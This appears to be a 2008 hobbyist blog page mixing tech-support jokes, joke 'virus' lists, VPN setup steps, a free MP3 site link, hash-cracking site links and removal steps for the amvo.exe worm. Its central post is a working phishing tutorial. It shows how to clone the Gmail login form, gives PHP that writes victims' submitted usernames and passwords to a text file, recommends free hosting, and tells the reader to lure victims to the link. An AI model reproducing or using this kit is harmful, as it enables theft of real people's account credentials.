RSS

June 28, 2008

Bidvertiser feed code

An unfailingly polite lady called to ask for help with a Windows installation that had gone terribly wrong.

Customer: “I brought my Windows disks from work to install them on my home computer.” (Training stresses that we are “not the Software Police,” so I let the little act of piracy slide.)

Tech Support: “Umm-hmm. What happened?”

Customer: “As I put each disk in it turns out they weren’t initialized.”

Tech Support: “Do you remember the message exactly, ma’am?”

Customer: (proudly) “I wrote it down. ‘This is not a Macintosh disk. Would you like to initialize it’?”

Tech Support: “Er, what happened next?”

Customer: “After they were initialized all the disks appeared to be blank. And now I brought them back to work, and I can’t read them in the A: drive; the PC wants to format them. And this is our only set of Windows disks for the whole office. Did I do something wrong?”

Well Guys! Nowadays hackers take the help of php-enabled web servers to successfully execute their FAKE LOGIN PAGES.I think this is the most usual technique of the script kiddies to carry out SOCIAL ENGINEERING.

Let’s see how they do it..!

USE OPERA OR IE 6.0 FOR BETTER SOURCE EDITING.DON’T USE FIREFOX.

We will make a fake login page of www.gmail.com today.

  • Go there and Rightclick—->View source and find the keyword “method”.Leave it as it is.
  • Now look for ‘action=“https://www.google.com/accounts/ServiceLoginAuth?service=mail”’ just before “method”.Change that, so now it will look like “action=”./getinfo.php”
  • Save the page as “index.html” in your computer.
  • Now will create “getinfo.php”.
  • Paste this in a new text file..->

<?php header(“Location: “);

$handle = fopen(“passwords.txt”, “a”);

foreach($_GET as $variable => $value)

{ fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit; ?>

Change the “Location:<something you want your page to redirect to after your victim enters the userid and password> in the php file.

I will recommend…

https://www.google.com/accounts/ServiceLoginAuth?service

=mail“.

Save the file as “getinfo.php”.

  • Now search for free bannerless php support web hosting servers.I would recommend www.110mb.com.Register there and get a domain like www.<something>.110mb.com.So now we have our own webserver.
  • Now create blank “passwords.txt” file to store your passwords.
  • So now we have three files “index.html”,”passwords.txt” and “getinfo.php”.
  • Upload the files in your registered webserver.Don’t insert those files in a user created directory.Just upload the files in the default root directory.
  • Now give your victim the link to your registered website ie. www.<something>.110mb.com.He will mistake it for the real “www.gmail.com” and may enter his real user id and password.If he enters he is doomed!.You will get the password and the user id in the “passwords.txt” file in your registered website.

Working:

SET UP A VPN CONNECTION

June 24, 2008

Way to connect to a VPN (Virtual Private Network) server from Windows XP.

  • Go to control panel.
  • Goto “Network Connections”—>New Connection Wizard.
  • Click Next then Check ‘Connect to the network at my workplace’.
  • Check “Virtual Private Network Connection”.
  • Give anything as Company Name.
  • Check “Automatically Dial this Initial Connection” and select your default internet connection from the list.
  • Give host name as ‘pptp.<hostname>.com’.     [Example "linkideo" ,"relakks"]
  • Click on ‘Finish’ [Check "Create a shortcut on my desktop"]
  • Launch the pptp client from the desktop shortcut.Give your registered vpn username and password and click “connect”.
  • CONGRATZ YOU ARE CONNECTED..!

Thanks!

CHECK OUT LINKIDEO!

June 24, 2008

This new French VPN service is really good and fast.They offer you a 128kb/s connection speed for free.Their server is nicely secured with a 128-bit encryption.

FREE OFFER:

  • 128kb/s connection speed.
  • Can’t access “https” servers.
  • Full Anonymity.

PAID OFFER:

  • Unlimited connection speed.
  • No Access restriction
  • Full Anonymity

Go There.

DON’T KNOW HOW TO SET UP VPN CONNECTION?

See the way..

It’s wise to remember how easily email — this wonderful technology — can be misused, sometimes unintentionally, with serious consequences.

Consider the case of the Illinois man who left the snow-filled streets of Chicago for a vacation in Florida. His wife was on a business trip and was planning to meet him there the next day. When he reached his hotel, he decided to send his wife a quick email.

Unfortunately, when typing her address, he missed one letter, and his note was directed instead to an elderly preacher’s wife whose husband had passed away only the day before. When the grieving widow checked her email, she took one look at the monitor, let out a piercing scream, and fell to the floor in a dead faint.

At the sound, her family rushed into the room and saw this note on the screen:

“Dearest Wife, Just got checked in. Everything prepared for your arrival tomorrow. P.S. Sure is hot down here.”

OPRAH WINFREY VIRUS:
Your 1.3gb hard drive suddenly shrinks to 80mb and then slowly expands back to 1.3gb.
AT&T VIRUS:
Every three minutes it tells you what great service you are getting.
MCI VIRUS:
Every three minutes it reminds you that you’re paying too much for the AT&T virus.
ARNOLD SCHWARZENEGGER VIRUS:
Terminates and stays resident. It’ll be back…
DAN QUAYLE VIRUS:
Prevents your system from spawning any child process without joining into a binary network.
TERRY RANDLE VIRUS:
Prints “oh no you don’t” whenever you choose “Abort”.
CONGRESSIONAL VIRUS:
Runs every program on the hard drive simultaneously, but doesn’t allow the user to accomplish anything.
EMELDA MARCOS VIRUS:
Sings you a song (slightly off key) on boot up, then subtracts money from your Quicken account and spends it all on expensive shoes it purchases through Prodigy.
GEORGE BUSH VIRUS:
It starts by boldly stating “Read my docs…No new files!” on the screen. It proceeds to fill up all the free space on your hard drive with new files, then blames it on the Congressional virus.
DENVER BRONCOS VIRUS:
Makes your P133 machine perform like a 286/AT
L.A.P.D. VIRUS:
It claims it feels threatened by the other files on your PC and erases them in “self-defense”.

WANNA D/L MP3 FOR FREE?

June 22, 2008

Check out this latest mp3 site:

F3MP3.

Now they have 3 servers as databases.You can almost get every song you need.

Thanks!

REMOVE AMVO!

June 22, 2008

Nowadays,we are all acquainted with the deadly virus “amvo.exe”.

Symptoms:

  • The computer slows down.
  • A memory fault error shows when you click on a logical/primary partition.
  • You can’t see your hidden files as “folder options” menu is disabled.

Steps of Recovery:

  • Thank god! you can access command prompt.Goto run and type “cmd”.Now open command prompt.
  • Goto the root of every drive (C:,D:,E:..etc) and search for “autorun.inf” file.Delete it with the command “del /f/ah <filename>” (as it is a system read-only file).If this doesn’t work try “attrib -h -s <filename>” to change the file atttribute and then delete it “del /f <filename>”.
  • Along with “autorun.inf”,you will find another weird looking .bat file e.g. a21345de.bat.Try to delete it with the above procedures.Make sure you have deleted every instance of autorun.inf and .bat file from every partition of your hard-drive.
  • We can access “Registry editor” too.If not then type “gpedit.msc” in Run and Goto Userconfiguration–>Administrative templates–>System.Look for the statement “prevent access to registry editing tools”.Double click it and select ‘disable’.To enable folder options,goto Userconfiguration–>Administrative templates–>Windows components–>Windows explorer.Find “removes the folder options menu from the tools menu”.I think you know what to do!.
  • Ok now that you can access “regestry editor”,type “regedit” in run and look for “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” .Delete “amvo”.
  • Then goto Edit–>Find and look for every instance of “amvo” in registry and delete it.
  • We did the above process to kill amvo at startup.
  • Now to get to normal shell processes goto run and type “regsvr32 /i shell32.dll” (To solve the drive clicking problem).
  • Restart your machine.
  • Now for the finishing job.Goto windows/system32 and remove every instance of amvo (amvo.exe,amv0.dll) etc.

AMVO IS OBLITERATED!

In Wargames you will come across Cryptographical levels which will give you codes to break.Well there are different types of encryptions and encodings in cyber world.Some online decyption sites I know of are:

  1. MD5DECRYPTION [Very good site for md5 hash cracking]
  2. YELLOWPIPE [Can break different types of encodings and encryptions]

CHECK OUT!